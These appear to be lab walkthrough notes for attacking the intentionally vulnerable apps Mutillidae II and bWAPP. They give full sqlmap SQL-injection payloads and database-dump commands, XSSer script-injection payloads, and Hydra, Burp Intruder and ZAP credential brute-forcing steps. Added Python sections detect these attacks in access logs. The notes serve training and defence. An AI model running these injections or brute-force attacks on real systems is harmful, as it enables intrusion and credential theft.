🔬 Passive Crawling with Burp Suite
- Target IP: 192.230.181.3 - Mutillidae II

```
ip -br -c a
eth1@if203734 UP 192.230.181.2/24
nmap -sS -sV 192.230.181.3
```

- Open the browser and navigate to `http://192.230.181.3/`
- Activate the `FoxyProxy` plugin
- Start `BurpSuite` (set User options/Display/Look to Darcula and restart BurpSuite)
- Intercept the home page request and turn off the intercept
- Check the `HTTP history` tab
- Browse the Mutillidae web app and Burp will crawl the visited pages
- Check the `Target` tab for a Site map
- Add the site to the Scope
SQL Injection - SQLMap
- Target IP: 192.42.186.3 - bWAPP

```
ip -br -c a
eth1@if178967 UP 192.42.186.2/24
nmap -sS -sV 192.42.186.3
```

- Open the browser and navigate to `http://192.42.186.3/`, login with `bee:bug`, select `SQL Injection (GET/Search)` and click the Hack button
- Input a string and search: `http://192.42.186.3/sqli_1.php?title=hacking&action=search`
- Activate the `FoxyProxy` plugin
- Start `BurpSuite` in Interception mode
- Refresh the page, intercept the request and copy the cookie
  - Cookie: `PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0`
- Run `sqlmap`, defining `title` as the test parameter

```
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title
---
Parameter: title (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=hacking' AND (SELECT 1664 FROM (SELECT(SLEEP(5)))MSwT) AND 'jFDG'='jFDG&action=search
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=hacking' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a767171,0x7379784e74504d4e76744b6e4c524b4e516a4f4f7878676a51734e6d4c744d547450424844474f76,0x7171707071),NULL,NULL-- -&action=search
---
```

- In BurpSuite, send the request to Repeater
- Copy the first payload from SQLMap and paste it as part of the `title` parameter:

```
hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search
```

- Use `sqlmap` to get a list of tables for the `bWAPP` database

```
# List databases
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
# List the tables of the bWAPP database
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
```

- Use `sqlmap` to get a list of columns in the `users` table of the `bWAPP` database

```
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
```

- Dump `password` and `email` for admin from the `users` table

```
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump
```

- Turn off Intercept mode in BurpSuite, navigate to `http://192.42.186.3/sqli_6.php` and turn Intercept mode back on
- Search the `example` string from the page and intercept the request
- Copy the request to a file and name the file `request`
- Use `sqlmap` with this request file

```
sqlmap -r request -p title
---
Parameter: title (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=example' AND (SELECT 9391 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9391=9391,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Yvps'='Yvps&action=search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=example' AND (SELECT 6244 FROM (SELECT(SLEEP(5)))dWNC) AND 'Hfwn'='Hfwn&action=search
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=example' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7071,0x7463445853774f49666461525a4b446d4a624a706a414976706b56495977444675766767546d6347,0x7162717871),NULL-- -&action=search
---
```

- In BurpSuite, send the request to Repeater
- Try the proposed payloads from SQLMap
- Change the request to pass the `version()` function to the database
XSS Attack - XSSer
- Target IP: 192.131.167.3 - Mutillidae II

```
ip -br -c a
eth1@if178967 UP 192.131.167.2/24
nmap -sS -sV 192.131.167.3
# If Firefox does not start, find its process and kill it
ps -e | grep firefox   # note the <PID> in the output
kill <PID>
```

- Navigate to the XSS Reflected - DNS Lookup webpage: `http://192.131.167.3/index.php?page=dns-lookup.php`
- Enter any text and `Lookup DNS`
- The value is reflected back on the web page
- Activate the `FoxyProxy` plugin
- Start `BurpSuite`
- Enter any text, `Lookup DNS` and intercept the request in `BurpSuite`
- Copy the request body and set `XSS` as the value of the `target_host` parameter
- Use `xsser` to check the vulnerability

```
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto
```

- Use a custom XSS payload

```
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>"
```

- Copy the `Final Attack` payload and use it in the browser or BurpSuite to trigger the XSS attack: `http://192.131.167.3/index.php?page=dns-lookup.php&target_host=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&dns-lookup-php-submit-button=Lookup+DNS`
- Perform an XSS Poll Question attack over a `GET` request: `http://192.131.167.3/index.php?page=user-poll.php`
- Copy the `URL`, replace the `nmap` value with `XSS` and pass it to XSSer: `http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=2&user-poll-php-submit-button=Submit+Vote`

```
xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote"
xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>"
```

- Open the `Final Attack` link in the browser: `http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&initials=2&user-poll-php-submit-button=Submit+Vote`
🔬 Authenticated XSS Attack with XSSer
- Target IP: 192.56.179.3 - bWAPP

```
ip -br -c a
eth1@if178967 UP 192.56.179.2/24
nmap -sS -sV 192.56.179.3
```

- Login with `bee:bug`, select the `HTML Injection - Reflected (GET)` bug and input any value. Copy the URL: `http://192.56.179.3/htmli_get.php?firstname=hi&lastname=hi&form=submit`
- Activate the `FoxyProxy` plugin, start `BurpSuite`, refresh the webpage and copy the `Cookie` from the Proxy intercepted request: `PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0`
- Stop the BurpSuite interceptor
- Run the `xsser` tool by:
  - replacing the `firstname` value string with `XSS`
  - feeding it the Cookie

```
xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0"
xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0" --Fp "<script>alert(1)</script>"
```
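A defender-side counterpart to the SQLMap and XSSer sections above, added here and not part of the original lab notes: a small Python scanner that URL-decodes the query parameters of access-log lines and flags the sqlmap error-based, time-based and UNION probes and the reflected `<script>` payload exactly as they appear on this page, plus sqlmap's default User-Agent. The log lines, IPs and timestamps are constructed, and `log_line`, `scan_line` and `scan_log` are my own helpers, not part of sqlmap, XSSer or bWAPP.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlencode, urlsplit

# Signatures for the three sqlmap techniques the lab reported (error-based FLOOR/RAND,
# time-based SLEEP, UNION probe) and for a reflected <script> payload.
SQLI_RULES = [("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(", re.I)),
              ("time-based", re.compile(r"\bSLEEP\s*\(", re.I)),
              ("union", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I))]
XSS_RULE = re.compile(r"<\s*/?\s*script\b|javascript:", re.I)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
                    r' (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')  # combined log format

def scan_line(line):
    """Return (ip, path, findings) for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url, findings = urlsplit(m["target"]), []
    # parse_qsl decodes once; the extra unquote_plus also catches double-encoded payloads
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        value = unquote_plus(value)
        findings += [f"sqli/{label}:{name}" for label, rx in SQLI_RULES if rx.search(value)]
        if XSS_RULE.search(value):
            findings.append(f"xss:{name}")
    if m["ua"].lower().startswith("sqlmap"):  # sqlmap's default User-Agent starts with "sqlmap/"
        findings.append("ua:sqlmap")
    return m["ip"], url.path, findings

def scan_log(text):
    """All parsed lines that carry at least one finding, in log order."""
    return [r for r in map(scan_line, text.splitlines()) if r and r[2]]

def log_line(ip, path, params, ua="Mozilla/5.0"):
    """Constructed combined-format line, as a web server would record the request."""
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {path}?{urlencode(params)} HTTP/1.1" 200 512 "-" "{ua}"'

# Constructed sample log: a benign search, the sqlmap error-based and time-based probes from the
# bWAPP lab, the UNION probe (hex abbreviated) replayed from Burp Repeater, the XSSer "Final Attack".
ERROR = ("hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),"
         "0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY")
TIME = "hacking' AND (SELECT 1664 FROM (SELECT(SLEEP(5)))MSwT) AND 'jFDG'='jFDG"
UNION = "hacking' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a767171,0x73,0x7171707071),NULL,NULL-- -"
SAMPLE_LOG = "\n".join([
    log_line("10.0.0.5", "/sqli_1.php", {"title": "hacking", "action": "search"}),
    log_line("10.0.0.9", "/sqli_1.php", {"title": ERROR, "action": "search"}, "sqlmap/1.7"),
    log_line("10.0.0.9", "/sqli_1.php", {"title": TIME, "action": "search"}, "sqlmap/1.7"),
    log_line("10.0.0.9", "/sqli_1.php", {"title": UNION, "action": "search"}),
    log_line("10.0.0.7", "/index.php", {"page": "dns-lookup.php", "target_host": "<script>alert(1)</script>"}),
])
```

The UNION line is reported even though it carries a browser User-Agent, which is why the signatures, not the User-Agent check, should carry the alert.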
🔬 Attacking HTTP Login Form with Hydra
- Target IP: 192.210.201.3 - bWAPP

```
ip -br -c a
eth1@if178967 UP 192.210.201.2/24
nmap -sS -sV 192.210.201.3
```

- Open the `http://192.210.201.3/login.php` page, view the source code and check the parameters passed in the login form
- Prepare a usernames list and a passwords list

```
echo -e "admin\nbee\nuser1\nuser2" > users
cat /root/Desktop/wordlists/100-common-passwords.txt > pws
echo "bug" >> pws
```

- Use `hydra` to retrieve the credentials

```
hydra -L users -P pws 192.210.201.3 http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"
```
🔬 Attacking Basic Auth with Burp Suite
- Target IP: 192.190.241.3 - bWAPP

```
ip -br -c a
eth1@if178967 UP 192.190.241.2/24
nmap -sS -sV 192.190.241.3
```

- Open Firefox, activate the `FoxyProxy` plugin, start `BurpSuite`, open `http://192.190.241.3/basic` and intercept the request. Forward the request, input some data and intercept the request. The `/basic` directory uses Basic Auth
- Send the request to Intruder
- Navigate to the Intruder - Positions tab
- Decode the `base64` string: it becomes `test:test`, like the input data from the login form
- Replace the credentials with a parameter to be substituted, like `§credentials§`
- In the Payload Options, load the `/root/Desktop/wordlists/100-common-passwords.txt` list
- In the Payload Processing, add an `Add prefix` rule and input `admin:` to prepend it to all the passwords
- Add an `Encode - Base64-encode` rule too
- Start the attack
- Check the entry result with status code `301`
- Send the `Authorization: Basic` value to Decoder
- Check the BurpSuite Decoder tab
- Decoded as a base64 string it is `admin:cookie1`
- Turn off the BurpSuite interceptor, open the web page and insert the found credentials

🚩 The flag is `d25db4ce54b60b49dfd7b32c52ed8d26`
🔬 Attacking HTTP Login Form with ZAProxy
- Target IP: 192.145.79.3 - bWAPP

```
ip -br -c a
eth1@if178967 UP 192.145.79.2/24
nmap -sS -sV 192.145.79.3
```

- Open the `owasp-zap` tool, Manual Explore, input the URL and launch the browser: `http://192.145.79.3`
- Attempt login with bad credentials. The website will be added to the sitemap inside `ZAP`
- Right click on the `POST` request and select Fuzz...
- Select the input username, click the Add button, Add again and input the payloads for username. Confirm with OK
- Select the input password and do the same thing with a list of possible passwords
- Start Fuzzer to start the attack, then check the results and the `302` response
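As an added example covering the Hydra, Burp Intruder and ZAP fuzzer sections (not from the original notes): detection logic that reads access-log lines and flags the bursts of failed logins those tools leave behind, using the status codes the notes themselves rely on (a 200 re-render versus a 302 for `/login.php`, a 401 versus the 301 for `/basic`). `parse`, `detect_bruteforce` and `log_line` are my own names, and the IPs and timestamps in the sample are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Failure vs. success in the access log: bWAPP's /login.php re-renders the form (200) on bad
# credentials and redirects (302) on success; /basic answers 401 until a valid header arrives, then 301/200.
RULES = {"/login.php": {"method": "POST", "fail": {200}, "success": {302}},
         "/basic": {"method": "GET", "fail": {401}, "success": {200, 301}}}

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["path"] = d["target"].split("?")[0].rstrip("/") or "/"  # /basic/ -> /basic
    return d

def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Per (ip, path): flag >= threshold failures inside window (chronological lines) and whether a success followed."""
    attempts = defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        rule = RULES.get(rec["path"])
        if rule and rec["method"] == rule["method"]:
            attempts[(rec["ip"], rec["path"])].append(rec)
    alerts = []
    for (ip, path), recs in attempts.items():
        fails = [r for r in recs if r["status"] in RULES[path]["fail"]]
        if not any(fails[i + threshold - 1]["ts"] - fails[i]["ts"] <= window for i in range(len(fails) - threshold + 1)):
            continue
        hit = any(r["status"] in RULES[path]["success"] and r["ts"] >= fails[0]["ts"] for r in recs)
        # Apache logs the attempted name in the remote-user field even on 401, so the sprayed "admin:" prefix shows up
        users = sorted({r["user"] for r in fails if r["user"] != "-"})
        alerts.append({"ip": ip, "path": path, "failures": len(fails), "users": users, "hit": hit})
    return alerts

def log_line(ip, path, status, sec, method="POST", user="-"):
    return f'{ip} - {user} [01/Jan/2024:10:00:{sec:02d} +0000] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'

# Constructed sample: a hydra-style burst of 8 bad POSTs then a 302; a user who mistypes once;
# an Intruder-style Basic Auth spray of 6 "admin:*" guesses then the 301.
SAMPLE = ([log_line("10.0.0.9", "/login.php", 200, s) for s in range(8)]
          + [log_line("10.0.0.9", "/login.php", 302, 8)]
          + [log_line("10.0.0.5", "/login.php", 200, 20), log_line("10.0.0.5", "/login.php", 302, 25)]
          + [log_line("10.0.0.7", "/basic/", 401, 30 + s, "GET", "admin") for s in range(6)]
          + [log_line("10.0.0.7", "/basic", 301, 37, "GET", "admin")])
```

The single mistyped login from 10.0.0.5 stays below the threshold and is not reported, while both tool-driven bursts are flagged together with the fact that a success followed them.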